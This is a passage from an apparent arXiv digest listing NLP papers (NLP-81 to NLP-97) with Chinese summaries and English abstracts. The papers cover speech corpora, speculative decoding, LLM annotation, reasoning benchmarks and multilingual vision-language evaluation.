experiments highlight the biases of three open-source LLMs: Llama3, Mistral, and Gemma, toward social attribution, and show the effectiveness of our mitigation strategies.
[NLP-81] Introducing MELI: the Mandarin-English Language Interview Corpus LREC2026
【速读】: 该论文旨在解决多语言语音数据资源匮乏的问题,特别是在汉语(Mandarin)与英语双语者自然交流场景下的跨语言声学对比分析需求。其解决方案的关键在于构建并发布MELI语料库——一个包含51名双语者在中文和英文中分别进行朗读与自发访谈的29.8小时开放源代码语音数据集,涵盖音频(44.1 kHz, 16-bit, 立体声)、逐词与逐音素强制对齐标注、完整转录及匿名化处理,并系统记录了语言切换模式与说话人语言态度关联信息,从而支持跨语言、跨说话人的声学比较与定性定量结合的语言行为研究。
链接: https://arxiv.org/abs/2603.27043
作者: Suyuan Liu,Molly Babel
机构: 未知
类目: Computation and Language (cs.CL)
备注: Accepted at LREC 2026 (14th International Conference on Language Resources and Evaluation), to appear in the conference proceedings
Abstract:We introduce the Mandarin-English Language Interview (MELI) Corpus, an open-source resource of 29.8 hours of speech from 51 Mandarin-English bilingual speakers. MELI combines matched sessions in Mandarin and English with two speaking styles: read sentences and spontaneous interviews about language varieties, standardness, and learning experiences. Audio was recorded at 44.1 kHz (16-bit, stereo). Interviews were fully transcribed, force-aligned at word and phone levels, and anonymized. Descriptively, the Mandarin component totals ~14.7 hours (mean duration 17.3 minutes) and the English component ~15.1 hours (mean duration 17.8 minutes). We report token/type statistics for each language and document code-switching patterns (frequent in Mandarin sessions; more limited in English sessions). The corpus design supports within-/cross-speaker, within/cross-language acoustic comparison and links acoustics to speakers’ stated language attitudes, enabling both quantitative and qualitative analyses. The MELI Corpus will be released with transcriptions, alignments, metadata, scans of labelled maps and documentation under a CC BY-NC 4.0 license.
[NLP-82] APS: Task Aware Proposal Distributions for Speculative Sampling
【速读】: 该论文旨在解决推测解码(speculative decoding)中轻量级草稿模型(draft model)的训练数据分布对解码质量影响不明确的问题,即探究草稿模型的性能是否依赖于其训练数据与下游任务之间的匹配程度。解决方案的关键在于:首先通过在不同数据集(MathInstruct、ShareGPT及混合数据)上训练轻量级草稿模型(HASS和EAGLE-2),评估其在多个基准测试(如MT-Bench、GSM8K等)上的接受长度(acceptance length)表现,发现任务特定训练能显著提升草稿模型在对应任务上的解码效率;其次提出在推理阶段采用基于置信度的路由策略(confidence-based routing) 和 合并树验证(merged-tree verification)机制 来组合多个专业化草稿模型,相较于权重空间平均或简单集成,该方法能更有效地提升整体接受长度,且置信度比熵更具判别力,从而实现更优的推测解码性能。
链接: https://arxiv.org/abs/2603.27027
作者: Mohamad Zbib,Mohamad Bazzi,Ammar Mohanna,Hasan Abed Al Kader Hammoud,Bernard Ghanem
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: 21 pages, 11 figures. Code: this https URL Weights: this https URL Datasets: this https URL
Abstract:Speculative decoding accelerates autoregressive generation by letting a lightweight draft model propose future tokens that a larger target model then verifies in parallel. In practice, however, draft models are usually trained on broad generic corpora, which leaves it unclear how much speculative decoding quality depends on the draft training distribution. We study this question with lightweight HASS and EAGLE-2 drafters trained on MathInstruct, ShareGPT, and mixed-data variants, evaluated on MT-Bench, GSM8K, MATH-500, and SVAMP. Measured by acceptance length, task-specific training yields clear specialization: MathInstruct-trained drafts are strongest on reasoning benchmarks, while ShareGPT-trained drafts are strongest on MT-Bench. Mixed-data training improves robustness, but larger mixtures do not dominate across decoding temperatures. We also study how to combine specialized drafters at inference time. Naive checkpoint averaging performs poorly, whereas confidence-based routing improves over single-domain drafts and merged-tree verification yields the highest acceptance length overall for both backbones. Finally, confidence is a more useful routing signal than entropy: rejected tokens tend to have higher entropy, but confidence produces much clearer benchmark-level routing decisions. These results show that speculative decoding quality depends not only on draft architecture, but also on the match between draft training data and downstream workload, and that specialized drafters are better combined at inference time than in weight space.
[NLP-83] Pashto Common Voice: Building the First Open Speech Corpus for a 60-Million-Speaker Low-Resource Language INTERSPEECH2026
【速读】: 该论文旨在解决帕什图语(Pashto)在开放语音技术资源中严重缺失的问题,其目标是构建首个大规模、开放许可的帕什图语语音语料库——Pashto Common Voice (MCV),以支持生成式 AI (Generative AI) 和语音识别模型的开发与训练。解决方案的关键在于多渠道社区参与机制:包括界面本地化、基于维基百科的句子提取与自动化过滤、针对四种最常被省略的帕什图语音素的定向贡献,以及通过VOA帕什图广播活动显著提升参与者数量(从CV17到CV18增长约108倍)。最终,MCV23包含107,781个音频片段(60,337个经验证),并实现了在Whisper Base模型上将词错误率(WER)从零样本下的99.0%降至13.4%,证明了该语料库对帕什图语语音识别任务的有效性。
链接: https://arxiv.org/abs/2603.27021
作者: Hanif Rahman,Shafeeq ur Rehman
机构: 未知
类目: Computation and Language (cs.CL)
备注: Submitted to Interspeech 2026
Abstract:We present the Pashto Common Voice corpus – the first large-scale, openly licensed speech resource for Pashto, a language with over 60 million native speakers largely absent from open speech technology. Through a community effort spanning 2022-2025, the corpus grew from 1.5 hours and 5 contributors to 147 total hours and 1,483 unique speakers across ten Mozilla Common Voice releases (CV14-CV23). Speaker participation increased approximately 108-fold between CV17 and CV18, coinciding with a VOA Pashto broadcast campaign. We describe the full methodology: interface localisation, Wikipedia-based sentence extraction with automated filtering, phonemically targeted contributions for the four most frequently dropped Pashto characters, and multi-channel community outreach. MCV23 contains 107,781 clips (60,337 validated; 82.33 validated hours) across 13 content domains. Fine-tuning Whisper Base on the MCV20 yields 13.4% WER on the MCV20 test split, against the published Whisper Base zero-shot WER of 99.0% on Pashto.
[NLP-84] RASPRef: Retrieval-Augmented Self-Supervised Prompt Refinement for Large Reasoning Models
【速读】: 该论文旨在解决当前生成式AI(Generative AI)在结构化推理任务中对提示(prompt)形式高度敏感的问题,即有效提示的设计通常依赖人工迭代且难以跨任务或领域扩展。解决方案的关键在于提出一种无需人类标注或任务特定监督的自监督提示优化框架——检索增强型自监督提示精炼(Retrieval-Augmented Self-Supervised Prompt Refinement, RASPRef),其核心机制是通过检索相关示例和历史推理轨迹,并利用多样本一致性、验证器反馈及模型自生成批评等信号,对提示本身进行迭代式优化,从而提升模型在GSM8K类数学推理任务中的表现。
链接: https://arxiv.org/abs/2603.27008
作者: Rahul Soni
机构: Independent Researcher (独立研究员)
类目: Computation and Language (cs.CL)
备注:
Abstract:Recent reasoning-focused language models such as DeepSeek R1 and OpenAI o1 have demonstrated strong performance on structured reasoning benchmarks including GSM8K, MATH, and multi-hop question answering tasks. However, their performance remains highly sensitive to prompt formulation, and designing effective prompts is typically a manual and iterative process that does not scale well across tasks or domains. To address this limitation, we introduce Retrieval-Augmented Self-Supervised Prompt Refinement (RASPRef), a framework that improves prompts without requiring human annotations or task-specific supervision. The approach retrieves relevant examples and previously generated reasoning trajectories, and leverages signals such as multi-sample consistency, verifier feedback, and model-generated critiques to iteratively refine the prompt. Unlike prior approaches that focus primarily on improving model outputs, RASPRef directly treats the prompt as the optimization target and improves it through an iterative retrieval-guided refinement process. Experiments on GSM8K-style mathematical reasoning tasks show that retrieval-guided prompting improves performance compared with a static prompting baseline. We further discuss how retrieval quality, trajectory selection, and self-supervised feedback signals may influence the effectiveness of prompt refinement. These findings suggest that prompt design remains a critical factor for reasoning-oriented language models, and that self-improving prompts offer a practical and scalable strategy for improving reasoning performance.
[NLP-85] he Last Fingerprint: How Markdown Training Shapes LLM Prose
【速读】: 该论文试图解决的问题是:大型语言模型(Large Language Models, LLMs)在生成文本时普遍存在“过度使用破折号(em dash)”的现象,这一现象虽被广泛讨论为AI生成文本的标志之一,但缺乏对其内在机制的解释,且未与模型训练中常见的Markdown格式偏好建立联系。解决方案的关键在于提出“破折号是Markdown结构残留”的假设,即LLMs从以Markdown为主的训练数据中内化了结构化表达习惯,导致破折号作为最小未被清除的结构单元持续出现在自然语言输出中;通过五步演化路径(训练数据组成→结构内化→破折号双功能属性→后训练放大效应)和多条件抑制实验(包括禁用Markdown指令、显式禁止破折号等),验证了该现象并非随机或风格缺陷,而是特定微调流程(如RLHF)的稳定标记,从而将原本孤立的两个在线讨论(破折号滥用与Markdown倾向)统一为可诊断模型微调方法的新指标。
链接: https://arxiv.org/abs/2603.27006
作者: E. M. Freeburg
机构: Anthropic; OpenAI; Meta; Google; DeepSeek
类目: Computation and Language (cs.CL)
备注: 14 pages, 3 tables. Code and data: this https URL
Abstract:Large language models produce em dashes at varying rates, and the observation that some models “overuse” them has become one of the most widely discussed markers of AI-generated text. Yet no mechanistic account of this pattern exists, and the parallel observation that LLMs default to markdown-formatted output has never been connected to it. We propose that the em dash is markdown leaking into prose – the smallest surviving unit of the structural orientation that LLMs acquire from markdown-saturated training corpora. We present a five-step genealogy connecting training data composition, structural internalization, the dual-register status of the em dash, and post-training amplification. We test this with a two-condition suppression experiment across twelve models from five providers (Anthropic, OpenAI, Meta, Google, DeepSeek): when models are instructed to avoid markdown formatting, overt features (headers, bullets, bold) are eliminated or nearly eliminated, but em dashes persist – except in Meta’s Llama models, which produce none at all. Em dash frequency and suppression resistance vary from 0.0 per 1,000 words (Llama) to 9.1 (GPT-4.1 under suppression), functioning as a signature of the specific fine-tuning procedure applied. A three-condition suppression gradient shows that even explicit em dash prohibition fails to eliminate the artifact in some models, and a base-vs-instruct comparison confirms that the latent tendency exists pre-RLHF. These findings connect two previously isolated online discourses and reframe em dash frequency as a diagnostic of fine-tuning methodology rather than a stylistic defect.
[NLP-86] FormalProofBench: Can Models Write Graduate Level Math Proofs That Are Formally Verified? ICLR2026 WWW
【速读】: 该论文旨在解决当前前沿生成式 AI (Generative AI) 模型在数学证明自动化方面的局限性,特别是其在产出可形式化验证的研究生级别数学证明(formally verified mathematical proofs)上的能力不足问题。解决方案的关键在于构建一个名为 FormalProofBench 的私有基准测试集,该基准涵盖分析、代数、概率与逻辑等核心数学领域,每项任务均以自然语言问题与 Lean 4 形式化陈述配对,并要求模型输出经 Lean 4 检查器验证通过的正式证明;同时采用代理式(agentic)评估框架对多种前沿模型进行系统性评测,从而全面衡量模型在工具调用、失败模式、成本和延迟等方面的性能表现。
链接: https://arxiv.org/abs/2603.26996
作者: Nikil Ravi,Kexing Ying,Vasilii Nesterov,Rayan Krishnan,Elif Uskuplu,Bingyu Xia,Janitha Aswedige,Langston Nashold
机构: Vals AI; École Polytechnique Fédérale de Lausanne (瑞士洛桑联邦理工学院); Moscow Institute of Physics and Technology (莫斯科物理技术学院); Indiana University, Bloomington (印第安纳大学布卢明顿分校); Independent Researcher
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Machine Learning (cs.LG); Programming Languages (cs.PL)
备注: Accepted at ICLR 2026 Workshop: VerifAI-2: The Second Workshop on AI Verification in the Wild. Live leaderboard hosted here: this https URL
Abstract:We present FormalProofBench, a private benchmark designed to evaluate whether AI models can produce formally verified mathematical proofs at the graduate level. Each task pairs a natural-language problem with a Lean~4 formal statement, and a model must output a Lean proof accepted by the Lean 4 checker. FormalProofBench targets advanced undergraduate and graduate mathematics, with problems drawn from qualifying exams and standard textbooks across topics including analysis, algebra, probability, and logic. We evaluate a range of frontier models with an agentic harness, and find that the best-performing foundation model achieves 33.5% accuracy, with performance dropping rapidly after that. In addition to the accuracy numbers, we also provide empirical analysis of tool-use, failure modes, cost and latency, thereby providing a thorough evaluation of the formal-theorem proving abilities of frontier models.
[NLP-87] A large corpus of lucid and non-lucid dream reports
【速读】: 该论文旨在解决 lucid dream(清醒梦)研究中因报告稀少且难以主动诱发而导致的样本不足问题,从而限制了对清醒梦现象学特征的深入理解与应用开发。其解决方案的关键在于构建了一个大规模、公开可用的梦境报告语料库,包含来自5000名贡献者的55,000条梦境记录,并通过用户自愿标注的方式获得10,000条清醒梦、25,000条非清醒梦及2,000条噩梦标签。该标注体系使得语言模式分析成为可能,验证结果表明清醒梦标签报告中的语言特征与已知的清醒梦特性一致,为未来清醒梦研究提供了高质量的数据基础和方法论支撑。
链接: https://arxiv.org/abs/2603.26992
作者: Remington Mallett
机构: 未知
类目: Computation and Language (cs.CL)
备注:
Abstract:All varieties of dreaming remain a mystery. Lucid dreams in particular, or those characterized by awareness of the dream, are notoriously difficult to study. Their scarce prevalence and resistance to deliberate induction make it difficult to obtain a sizeable corpus of lucid dream reports. The consequent lack of clarity around lucid dream phenomenology has left the many purported applications of lucidity under-realized. Here, a large corpus of 55k dream reports from 5k contributors is curated, described, and validated for future research. Ten years of publicly available dream reports were scraped from an online forum where users share anonymous dream journals. Importantly, users optionally categorize their dream as lucid, non-lucid, or a nightmare, offering a user-provided labeling system that includes 10k lucid and 25k non-lucid, and 2k nightmare labels. After characterizing the corpus with descriptive statistics and visualizations, construct validation shows that language patterns in lucid-labeled reports are consistent with known characteristics of lucid dreams. While the entire corpus has broad value for dream science, the labeled subset is particularly powerful for new discoveries in lucid dream studies.
[NLP-88] Multilingual Stutter Event Detection for English German and Mandarin Speech
【速读】: 该论文旨在解决自动化口吃检测系统在不同语言环境下泛化能力不足的问题,即现有方法往往依赖单一语言数据训练,导致跨语言迁移性能受限。其解决方案的关键在于利用多语种(英语、德语)和多语料库的标注数据进行联合训练,使模型能够捕捉到跨语言一致的口吃特征(stuttering characteristics),从而实现语言无关的鲁棒检测。实验表明,这种多语言训练策略不仅性能可媲美甚至优于以往单语模型,还验证了口吃在不同语言间存在一致性,为构建通用型口吃检测系统提供了可行路径。
链接: https://arxiv.org/abs/2603.26939
作者: Felix Haas,Sebastian P. Bayerl
机构: 未知
类目: ound (cs.SD); Computation and Language (cs.CL); Audio and Speech Processing (eess.AS)
备注:
Abstract:This paper presents a multi-label stuttering detection system trained on multi-corpus, multilingual data in English, German, and this http URL leveraging annotated stuttering data from three languages and four corpora, the model captures language-independent characteristics of stuttering, enabling robust detection across linguistic contexts. Experimental results demonstrate that multilingual training achieves performance comparable to and, in some cases, even exceeds that of previous systems. These findings suggest that stuttering exhibits cross-linguistic consistency, which supports the development of language-agnostic detection systems. Our work demonstrates the feasibility and advantages of using multilingual data to improve generalizability and reliability in automated stuttering detection.
[NLP-89] In your own words: computationally identifying interpretable themes in free-text survey data
【速读】: 该论文旨在解决自由文本调查数据难以进行统计分析的问题,尤其是如何从非结构化文本中提取出可解释且具有实际应用价值的主题。其解决方案的关键在于提出了一种名为“In Your Own Words”的计算框架,该框架能够更精确地识别自由文本中的结构化、可解释主题,从而支持系统性的探索性分析。相较于以往方法,该框架不仅提升了主题识别的准确性,还为问卷设计优化、揭示标准化分类内部异质性以及阐明自我认同与感知认同之间的系统性不一致提供了新的洞见。
链接: https://arxiv.org/abs/2603.26930
作者: Jenny S Wang,Aliya Saperstein,Emma Pierson
机构: Harvard Business School (哈佛商学院); Stanford University (斯坦福大学); University of California, Berkeley (加州大学伯克利分校)
类目: Computers and Society (cs.CY); Computation and Language (cs.CL)
备注:
Abstract:Free-text survey responses can provide nuance often missed by structured questions, but remain difficult to statistically analyze. To address this, we introduce In Your Own Words, a computational framework for exploratory analyses of free-text survey data that identifies structured, interpretable themes in free-text responses more precisely than previous computational approaches, facilitating systematic analysis. To illustrate the benefits of this approach, we apply it to a new dataset of free-text descriptions of race, gender, and sexual orientation from 1,004 U.S. participants. The themes our approach learns have three practical applications in survey research. First, the themes can suggest structured questions to add to future surveys by surfacing salient constructs – such as belonging and identity fluidity – that existing surveys do not capture. Second, the themes reveal heterogeneity within standardized categories, explaining additional variation in health, well-being, and identity importance. Third, the themes illuminate systematic discordance between self-identified and perceived identities, highlighting mechanisms of misrecognition that existing measures do not reflect. More broadly, our framework can be deployed in a wide range of survey settings to identify interpretable themes from free text, complementing existing qualitative methods.
[NLP-90] Magic Words or Methodical Work? Challenging Conventional Wisdom in LLM -Based Political Text Annotation
【速读】: 该论文旨在解决政治科学领域中大规模语言模型(Large Language Models, LLMs)在文本标注任务中的实现选择敏感性问题,即不同模型、模型规模、学习方法和提示风格的组合如何影响标注结果,以及当前广泛采纳的“最佳实践”是否在严格控制条件下依然有效。其解决方案的关键在于提出一种验证优先(validation-first)框架:通过系统性基准测试揭示交互效应主导主效应的现象,强调应以结构化顺序决策、提示冻结与保留评估、标准化报告规范及开源工具支持,来提升研究过程的透明度与可重复性,从而规避因随意选择模型或提示策略而导致的研究者自由度偏差。
链接: https://arxiv.org/abs/2603.26898
作者: Lorca McLaren,James Cross,Zuzanna Krakowska,Robin Rauner,Martijn Schoonvelde
机构: University College Dublin(都柏林大学); University of Groningen(格罗宁根大学)
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Political scientists are rapidly adopting large language models (LLMs) for text annotation, yet the sensitivity of annotation results to implementation choices remains poorly understood. Most evaluations test a single model or configuration; how model choice, model size, learning approach, and prompt style interact, and whether popular “best practices” survive controlled comparison, are largely unexplored. We present a controlled evaluation of these pipeline choices, testing six open-weight models across four political science annotation tasks under identical quantisation, hardware, and prompt-template conditions. Our central finding is methodological: interaction effects dominate main effects, so seemingly reasonable pipeline choices can become consequential researcher degrees of freedom. No single model, prompt style, or learning approach is uniformly superior, and the best-performing model varies across tasks. Two corollaries follow. First, model size is an unreliable guide both to cost and to performance: cross-family efficiency differences are so large that some larger models are less resource-intensive than much smaller alternatives, while within model families mid-range variants often match or exceed larger counterparts. Second, widely recommended prompt engineering techniques yield inconsistent and sometimes negative effects on annotation performance. We use these benchmark results to develop a validation-first framework - with a principled ordering of pipeline decisions, guidance on prompt freezing and held-out evaluation, reporting standards, and open-source tools - to help researchers navigate this decision space transparently.
[NLP-91] Arithmetic OOD Failure Unfolds in Stages in Minimal GPT s
【速读】: 该论文旨在解决生成式模型在算术外推(Out-of-Distribution, OOD)场景下,尤其是从2位数加法推广到3位数加法时的失败机制问题。研究发现,这种失败并非单一原因所致,而是具有阶段性特征:首先存在布局障碍(layout barrier),即模型对绝对位置的依赖导致其在纯3位数布局下失效;其次,在修复布局后,百位数字表现为“进位标志”而非语义上的百位数值(carry-semantics failure);再次,即使修正了进位语义,仍存在条件重组瓶颈(conditional recomposition bottleneck),即模型难以有效组合高条件尾部数据;最后,残余错误主要集中在十位数上,通过引入符号感知的十位修复策略可显著提升性能。因此,论文提出了一种实验可验证的分解框架,将算术OOD失败系统性地拆解为布局、进位语义、重组和晚期十位残差四个阶段,并针对性地提出干预方案,揭示了模型泛化失败的多层级成因与改进路径。
链接: https://arxiv.org/abs/2603.26828
作者: Seine A. Shintani
机构: 未知
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: 16 pages, 4 figures
Abstract:Arithmetic benchmarks are often reduced to a single held-out score, but that score can conflate qualitatively different failures. We study a controlled minimal GPT trained on exhaustive 2-digit addition, where all local digit transitions are already present in training, and ask why 3-digit generalization still fails. The failure is staged. First, there is a layout barrier: a learned absolute-position model collapses under a pure 3-digit layout shift, and mixed-layout exposure is the only intervention that materially weakens this barrier. Second, after layout repair, the hundreds position behaves like a carry flag rather than a semantic hundreds digit; targeted carry probes reverse the relevant logit margin, whereas a matched extra-data control does not. Third, after carry repair, the main remaining bottleneck is conditional recomposition: high-conditioned tail data outperforms a matched control, high-only data, and tail-only data on all true-3-digit suites, and the same ordering reappears in a larger 2-layer bridge experiment. The residual errors after recomposition are then overwhelmingly tens-only, and a separate 10-seed late-stage study shows that a sign-aware tens repair raises exact match on the hardest thousands-carry suite from 0.664 to 0.822. We therefore provide an experimentally testable decomposition of arithmetic OOD failure into layout, carry-semantics, recomposition, and late tens-residual stages.
[NLP-92] CRISP: Characterizing Relative Impact of Scholarly Publications
【速读】: 该论文旨在解决现有文献影响力评估方法中因孤立分析单篇引用文本而导致无法进行跨引用比较的问题。传统方法仅关注引文在被引论文中的局部上下文,忽略了引用列表的整体语境信息,从而限制了对引用影响力的真实区分能力。其解决方案的关键在于提出CRISP框架,通过大语言模型(Large Language Models, LLMs)联合排序同一论文所引用的所有文献,利用全引用上下文提升判断准确性;同时为缓解LLM的顺序偏差,采用三次随机化排序并以多数投票聚合影响标签,实现更可靠、高效且成本可控的引用影响力分析。
链接: https://arxiv.org/abs/2603.26791
作者: Hannah Collison,Benjamin Van Durme,Daniel Khashabi
机构: Johns Hopkins University (约翰霍普金斯大学)
类目: Digital Libraries (cs.DL); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Computers and Society (cs.CY)
备注:
Abstract:Assessing a cited paper’s impact is typically done by analyzing its citation context in isolation within the citing paper. While this focuses on the most directly relevant text, it prevents relative comparisons across all the works a paper cites. We propose CRISP, which instead jointly ranks all cited papers within a citing paper using large language models (LLMs). To mitigate LLMs’ positional bias, we rank each list three times in a randomized order and aggregate the impact labels through majority voting. This joint approach leverages the full citation context, rather than evaluating citations independently, to more reliably distinguish impactful references. CRISP outperforms a prior state-of-the-art impact classifier by +9.5% accuracy and +8.3% F1 on a dataset of human-annotated citations. CRISP further gains efficiency through fewer LLM calls and performs competitively with an open-source model, enabling scalable, cost-effective citation impact analysis. We release our rankings, impact labels, and codebase to support future research.
[NLP-93] Learning to Select Visual In-Context Demonstrations CVPR
【速读】: 该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在视觉任务中依赖上下文学习(In-Context Learning, ICL)时,演示样本选择质量不足的问题。现有主流方法采用无监督的k近邻(k-Nearest Neighbor, kNN)搜索策略,虽简单但对复杂事实回归任务表现不佳,因其倾向于选择冗余示例,难以覆盖任务输出的完整范围。解决方案的关键在于将演示选择重构为序贯决策问题,并提出一种基于强化学习的“学习选择演示”(Learning to Select Demonstrations, LSD)框架:通过双DQN(Dueling DQN)结合以查询为中心的Transformer解码器训练一个策略代理,该代理能够平衡视觉相关性与多样性,从而生成更优的演示集,显著提升MLLM在客观事实回归任务上的性能。
链接: https://arxiv.org/abs/2603.26775
作者: Eugene Lee,Yu-Chi Lin,Jiajie Diao
机构: University of Cincinnati (辛辛那提大学); University of California, Los Angeles (加州大学洛杉矶分校)
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Computer Vision and Pattern Recognition (cs.CV)
备注: 21 pages, 12 figure, accepted to Computer Vision and Pattern Recognition Conference (CVPR) 2026 Findings Track
Abstract:Multimodal Large Language Models (MLLMs) adapt to visual tasks via in-context learning (ICL), which relies heavily on demonstration quality. The dominant demonstration selection strategy is unsupervised k-Nearest Neighbor (kNN) search. While simple, this similarity-first approach is sub-optimal for complex factual regression tasks; it selects redundant examples that fail to capture the task’s full output range. We reframe selection as a sequential decision-making problem and introduce Learning to Select Demonstrations (LSD), training a Reinforcement Learning agent to construct optimal demonstration sets. Using a Dueling DQN with a query-centric Transformer Decoder, our agent learns a policy that maximizes MLLM downstream performance. Evaluating across five visual regression benchmarks, we uncover a crucial dichotomy: while kNN remains optimal for subjective preference tasks, LSD significantly outperforms baselines on objective, factual regression tasks. By balancing visual relevance with diversity, LSD better defines regression boundaries, illuminating when learned selection is strictly necessary for visual ICL.
[NLP-94] LogicDiff: Logic-Guided Denoising Improves Reasoning in Masked Diffusion Language Models
【速读】: 该论文旨在解决掩码扩散语言模型(Masked Diffusion Language Models, MDLMs)在推理任务中表现不佳的问题,特别是由于其标准基于置信度的解掩码策略会系统性延迟高熵逻辑连接词(logical connective tokens)的生成,而这些连接词是推理链中的关键分支点,导致推理性能严重下降。解决方案的关键在于提出一种无需修改模型参数、不依赖强化学习或任务特定训练的推理时方法——LogicDiff,其核心是引入一个轻量级分类头(4.2M参数)从基础模型的隐藏状态中准确预测每个掩码位置的逻辑角色(如前提、连接词、推导步骤、结论等),并采用依赖顺序调度器按逻辑依赖顺序依次解掩码:先前提、再连接词、后推导步骤和结论。实验证明,该方法显著提升了MDLM在GSM8K和MATH-500上的推理准确率,表明推理缺陷主要源于次优的解掩码顺序,而非模型表征能力不足。
链接: https://arxiv.org/abs/2603.26771
作者: Shaik Aman
机构: 未知
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: 9 pages, 3 figures, 3 tables
Abstract:Masked diffusion language models (MDLMs) generate text by iteratively unmasking tokens from a fully masked sequence, offering parallel generation and bidirectional context. However, their standard confidence-based unmasking strategy systematically defers high-entropy logical connective tokens, the critical branching points in reasoning chains, leading to severely degraded reasoning performance. We introduce LogicDiff, an inference-time method that replaces confidence-based unmasking with logic-role-guided unmasking. A lightweight classification head (4.2M parameters, 0.05% of the base model) predicts the logical role of each masked position (premise, connective, derived step, conclusion, or filler) from the base model’s hidden states with 98.4% accuracy. A dependency-ordered scheduler then unmasks tokens in logical dependency order: premises first, then connectives, then derived steps, then conclusions. Without modifying a single parameter of the base model and without any reinforcement learning or task-specific training, LogicDiff improves LLaDA-8B-Instruct accuracy from 22.0% to 60.7% on GSM8K (+38.7 percentage points) and from 23.6% to 29.2% on MATH-500 (+5.6 pp), with less than 6% speed overhead. Our results demonstrate that a substantial portion of the reasoning deficit in MDLMs is attributable to suboptimal token unmasking order, not to limitations of the model’s learned representations.
[NLP-95] Aesthetic Assessment of Chinese Handwritings Based on Vision Language Models CCL2025
【速读】: 该论文旨在解决当前汉字手写质量自动评估方法仅提供分数反馈(score-only feedback)而缺乏具体改进建议的问题,这种局限性导致其在提升学习者书写技能方面的有效性不足。解决方案的关键在于利用视觉-语言模型(Vision-Language Models, VLMs)对汉字手写质量进行分析,并生成多层次的反馈信息,包括基础评分(Task 1)和丰富、描述性的反馈(Task 2),同时通过低秩适应(Low-Rank Adaptation, LoRA)微调与上下文学习(in-context learning)两种策略将美学评估知识有效融入VLM中,从而显著提升反馈的指导性和实用性,在CCL 2025手写汉字质量评估竞赛中取得了领先性能。
链接: https://arxiv.org/abs/2603.26768
作者: Chen Zheng,Yuxuan Lai,Haoyang Lu,Wentao Ma,Jitao Yang,Jian Wang
机构: The Open University of China (中国开放大学); Engineering Research Center of Integration and Application of Digital Learning Technology, Ministry of Education (教育部数字学习技术集成与应用工程研究中心); OUC-online (中国开放大学在线)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: Accepted by CCL2025
Abstract:The handwriting of Chinese characters is a fundamental aspect of learning the Chinese language. Previous automated assessment methods often framed scoring as a regression problem. However, this score-only feedback lacks actionable guidance, which limits its effectiveness in helping learners improve their handwriting skills. In this paper, we leverage vision-language models (VLMs) to analyze the quality of handwritten Chinese characters and generate multi-level feedback. Specifically, we investigate two feedback generation tasks: simple grade feedback (Task 1) and enriched, descriptive feedback (Task 2). We explore both low-rank adaptation (LoRA)-based fine-tuning strategies and in-context learning methods to integrate aesthetic assessment knowledge into VLMs. Experimental results show that our approach achieves state-of-the-art performances across multiple evaluation tracks in the CCL 2025 workshop on evaluation of handwritten Chinese character quality.
[NLP-96] Do Multilingual VLMs Reason Equally? A Cross-Lingual Visual Reasoning Audit for Indian Languages KR
【速读】: 该论文旨在解决当前视觉语言模型(Vision-Language Models, VLMs)在多语言场景下,尤其是印度本土语言中的视觉推理能力评估缺失的问题。现有评测体系主要基于英文数据集(如MathVista、ScienceQA和MMMU),导致模型在非英语语境下的性能表现缺乏系统性分析。解决方案的关键在于构建首个针对印度语言的跨语言视觉推理审计:将980个英文问题通过IndicTrans2翻译成六种印度主流语言(包括印地语、泰米尔语、泰卢固语、孟加拉语、卡纳达语和马拉地语),并利用Gemini 2.0 Flash进行跨翻译者一致性验证(kappa=0.79–0.84)。随后对八种VLMs(从7B开源模型到GPT-4o)进行全面测试,生成68,600条推理记录,并包含文本仅输入与思维链(Chain-of-Thought, CoT)提示的消融实验,揭示了模型在印度语言中平均下降9.8–25个百分点的性能差距,且德拉维达语系语言受损更严重(比印欧语系高最多13.2个百分点),同时发现CoT提示反而恶化了孟加拉语和卡纳达语的表现,表明当前VLMs存在明显的英语中心主义推理偏差。
链接: https://arxiv.org/abs/2603.26742
作者: Swastik R
机构: Indian Institute of Information Technology, Raichur (印度信息技术学院,拉伊丘尔)
类目: Computation and Language (cs.CL); Machine Learning (cs.LG)
备注: 16 pages, 10 figures, 6 tables. Code and data: this https URL Dataset: this https URL
Abstract:Vision-language models score well on mathematical, scientific, and spatial reasoning benchmarks, yet these evaluations are overwhelmingly English. I present the first cross-lingual visual reasoning audit for Indian languages. 980 questions from MathVista, ScienceQA, and MMMU are translated into Hindi, Tamil, Telugu, Bengali, Kannada, and Marathi using IndicTrans2, with Gemini 2.0 Flash cross-verification on 50 samples per language (inter-translator agreement 0.79-0.84). Eight VLMs, from 7B open-source models to GPT-4o, are evaluated across all seven languages, yielding 68,600 inference records that include text-only and chain-of-thought ablations. I find accuracy drops of 9.8-25 percentage points when switching from English to an Indian language, with Dravidian languages suffering up to 13.2 pp more than Indo-Aryan. Chain-of-thought prompting degrades Bengali (-14.4 pp) and Kannada (-11.4 pp) rather than helping, exposing English-centric reasoning chains. Aya-Vision-8B, built for 23 languages, still drops 28.5 pp on Dravidian scripts; multilingual pretraining alone does not transfer visual reasoning. I release the translated benchmark and all model outputs.
[NLP-97] SleepVLM: Explainable and Rule-Grounded Sleep Staging via a Vision-Language Model
【速读】: 该论文旨在解决自动化睡眠分期(sleep staging)在临床应用中因缺乏可审计推理而难以推广的问题。其核心解决方案是提出SleepVLM,一种基于规则的视觉语言模型(rule-grounded vision-language model, VLM),能够从多通道多导睡眠图(polysomnography, PSG)波形图像中进行睡眠分期,并生成符合美国睡眠医学会(AASM)评分标准的、面向临床医生的可读解释。关键创新在于采用波形感知预训练(waveform-perceptual pre-training)与规则引导的监督微调(rule-grounded supervised fine-tuning),使模型在保持与最先进方法相当的性能(Cohen’s kappa达0.767和0.743)的同时,提供高可信度的透明化推理过程,从而提升自动化睡眠分期系统的可解释性与临床采纳潜力。
链接: https://arxiv.org/abs/2603.26738
作者: Guifeng Deng,Pan Wang,Jiquan Wang,Shuying Rao,Junyi Xie,Wanjun Guo,Tao Li,Haiteng Jiang
机构: 未知
